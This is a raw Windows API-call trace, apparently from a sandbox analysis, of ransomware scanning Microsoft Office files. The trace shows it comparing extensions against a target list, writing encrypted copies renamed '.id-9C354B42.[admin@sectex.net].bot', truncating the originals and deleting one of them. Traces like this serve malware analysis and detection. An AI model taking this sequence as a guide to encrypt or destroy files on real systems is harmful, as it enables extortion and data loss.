	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString=".doc") returned 4
	[0148.719] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.719] lstrlenW (lpString=".docx") returned 5
	[0148.719] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.719] lstrlenW (lpString=".pdf") returned 4
	[0148.719] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.719] lstrlenW (lpString=".xls") returned 4
	[0148.719] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.719] lstrlenW (lpString=".xlsx") returned 5
	[0148.719] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.719] lstrlenW (lpString=".ppt") returned 4
	[0148.719] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString=".zip") returned 4
	[0148.719] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.719] lstrlenW (lpString=".rar") returned 4
	[0148.719] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.719] lstrlenW (lpString=".bz2") returned 4
	[0148.719] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.719] lstrlenW (lpString=".7z") returned 3
	[0148.719] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString=".dbf") returned 4
	[0148.719] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.720] lstrlenW (lpString=".1cd") returned 4
	[0148.720] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.720] lstrlenW (lpString=".jpg") returned 4
	[0148.720] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.720] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0148.720] lstrlenW (lpString="OISINTL.DLL") returned 11
	[0148.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\oisintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.756] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=129432) returned 1
	[0148.756] CloseHandle (hObject=0x3f0) returned 1
	[0148.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\oisintl.dll")) returned 0x20
	[0148.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\oisintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\oisintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.155] lstrlenW (lpString=".doc") returned 4
	[0149.155] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.155] lstrlenW (lpString=".docx") returned 5
	[0149.155] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.155] lstrlenW (lpString=".pdf") returned 4
	[0149.155] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.155] lstrlenW (lpString=".xls") returned 4
	[0149.155] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.155] lstrlenW (lpString=".xlsx") returned 5
	[0149.155] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.155] lstrlenW (lpString=".ppt") returned 4
	[0149.155] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.155] lstrlenW (lpString=".zip") returned 4
	[0149.155] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString=".rar") returned 4
	[0149.156] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString=".bz2") returned 4
	[0149.156] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.156] lstrlenW (lpString=".7z") returned 3
	[0149.156] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString=".dbf") returned 4
	[0149.156] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString=".1cd") returned 4
	[0149.156] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString=".jpg") returned 4
	[0149.156] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString=".doc") returned 4
	[0149.156] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString=".docx") returned 5
	[0149.156] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.156] lstrlenW (lpString=".pdf") returned 4
	[0149.156] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString=".xls") returned 4
	[0149.156] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString=".xlsx") returned 5
	[0149.156] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.156] lstrlenW (lpString=".ppt") returned 4
	[0149.156] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.156] lstrlenW (lpString=".zip") returned 4
	[0149.157] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.157] lstrlenW (lpString=".rar") returned 4
	[0149.157] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.157] lstrlenW (lpString=".bz2") returned 4
	[0149.157] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.157] lstrlenW (lpString=".7z") returned 3
	[0149.157] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.157] lstrlenW (lpString=".dbf") returned 4
	[0149.157] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.157] lstrlenW (lpString=".1cd") returned 4
	[0149.157] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OISINTL.DLL") returned 59
	[0149.157] lstrlenW (lpString=".jpg") returned 4
	[0149.157] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.157] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0149.157] lstrlenW (lpString="ORGCHART.VSL") returned 12
	[0149.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.466] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=57248) returned 1
	[0149.466] CloseHandle (hObject=0x3f4) returned 1
	[0149.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl")) returned 0x20
	[0149.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.521] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.522] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0149.522] GetLastError () returned 0x0
	[0149.522] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xdfa0, lpOverlapped=0x0) returned 1
	[0149.612] WriteFile (in: hFile=0x3a0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xdfb0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xdfb0, lpOverlapped=0x0) returned 1
	[0149.614] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.614] WriteFile (in: hFile=0x3a0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.614] SetEndOfFile (hFile=0x3a0) returned 1
	[0149.614] CloseHandle (hObject=0x3a0) returned 1
	[0149.614] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.614] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.807] CloseHandle (hObject=0x3d0) returned 1
	[0149.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgchart.vsl")) returned 1
	[0149.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.823] lstrlenW (lpString=".doc") returned 4
	[0149.823] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.823] lstrlenW (lpString=".docx") returned 5
	[0149.823] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0149.823] lstrlenW (lpString=".pdf") returned 4
	[0149.823] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.823] lstrlenW (lpString=".xls") returned 4
	[0149.823] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.823] lstrlenW (lpString=".xlsx") returned 5
	[0149.823] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0149.823] lstrlenW (lpString=".ppt") returned 4
	[0149.823] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.823] lstrlenW (lpString=".zip") returned 4
	[0149.823] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.824] lstrlenW (lpString=".rar") returned 4
	[0149.824] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString=".bz2") returned 4
	[0149.824] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString=".7z") returned 3
	[0149.824] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.824] lstrlenW (lpString=".dbf") returned 4
	[0149.824] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.824] lstrlenW (lpString=".1cd") returned 4
	[0149.824] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.824] lstrlenW (lpString=".jpg") returned 4
	[0149.824] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.824] lstrlenW (lpString=".doc") returned 4
	[0149.824] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString=".docx") returned 5
	[0149.824] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0149.824] lstrlenW (lpString=".pdf") returned 4
	[0149.824] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.824] lstrlenW (lpString=".xls") returned 4
	[0149.824] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.824] lstrlenW (lpString=".xlsx") returned 5
	[0149.824] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0149.824] lstrlenW (lpString=".ppt") returned 4
	[0149.824] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.825] lstrlenW (lpString=".zip") returned 4
	[0149.825] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.825] lstrlenW (lpString=".rar") returned 4
	[0149.825] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.825] lstrlenW (lpString=".bz2") returned 4
	[0149.825] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.825] lstrlenW (lpString=".7z") returned 3
	[0149.825] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.825] lstrlenW (lpString=".dbf") returned 4
	[0149.825] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.825] lstrlenW (lpString=".1cd") returned 4
	[0149.825] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCHART.VSL") returned 60
	[0149.825] lstrlenW (lpString=".jpg") returned 4
	[0149.825] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.825] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.825] lstrlenW (lpString="PJINTL.DLL") returned 10
	[0149.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.835] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=3384192) returned 1
	[0149.835] CloseHandle (hObject=0x384) returned 1
	[0149.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintl.dll")) returned 0x20
	[0149.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.984] lstrlenW (lpString=".doc") returned 4
	[0149.984] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.984] lstrlenW (lpString=".docx") returned 5
	[0149.984] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.984] lstrlenW (lpString=".pdf") returned 4
	[0149.984] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.984] lstrlenW (lpString=".xls") returned 4
	[0149.984] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.984] lstrlenW (lpString=".xlsx") returned 5
	[0149.984] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.984] lstrlenW (lpString=".ppt") returned 4
	[0149.985] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString=".zip") returned 4
	[0149.985] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.985] lstrlenW (lpString=".rar") returned 4
	[0149.985] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.985] lstrlenW (lpString=".bz2") returned 4
	[0149.985] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.985] lstrlenW (lpString=".7z") returned 3
	[0149.985] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString=".dbf") returned 4
	[0149.985] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString=".1cd") returned 4
	[0149.985] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString=".jpg") returned 4
	[0149.985] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.985] lstrlenW (lpString=".doc") returned 4
	[0149.985] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString=".docx") returned 5
	[0149.986] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.986] lstrlenW (lpString=".pdf") returned 4
	[0149.986] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString=".xls") returned 4
	[0149.986] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString=".xlsx") returned 5
	[0149.986] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.986] lstrlenW (lpString=".ppt") returned 4
	[0149.986] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.986] lstrlenW (lpString=".zip") returned 4
	[0149.986] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString=".rar") returned 4
	[0149.986] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.986] lstrlenW (lpString=".bz2") returned 4
	[0149.986] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.986] lstrlenW (lpString=".7z") returned 3
	[0149.986] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.986] lstrlenW (lpString=".dbf") returned 4
	[0149.986] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.986] lstrlenW (lpString=".1cd") returned 4
	[0149.986] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTL.DLL") returned 58
	[0149.986] lstrlenW (lpString=".jpg") returned 4
	[0149.986] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.987] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0149.987] lstrlenW (lpString="PROPRPT.VSL") returned 11
	[0149.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.131] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=137096) returned 1
	[0150.131] CloseHandle (hObject=0x3ec) returned 1
	[0150.131] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl")) returned 0x20
	[0150.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0150.195] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.195] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.200] GetLastError () returned 0x0
	[0150.200] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x21788, lpOverlapped=0x0) returned 1
	[0150.235] WriteFile (in: hFile=0x3fc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x21790, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x21790, lpOverlapped=0x0) returned 1
	[0150.238] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.238] WriteFile (in: hFile=0x3fc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0150.238] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.238] CloseHandle (hObject=0x3fc) returned 1
	[0150.238] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.238] SetEndOfFile (hFile=0x3f8) returned 1
	[0150.242] CloseHandle (hObject=0x3f8) returned 1
	[0150.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
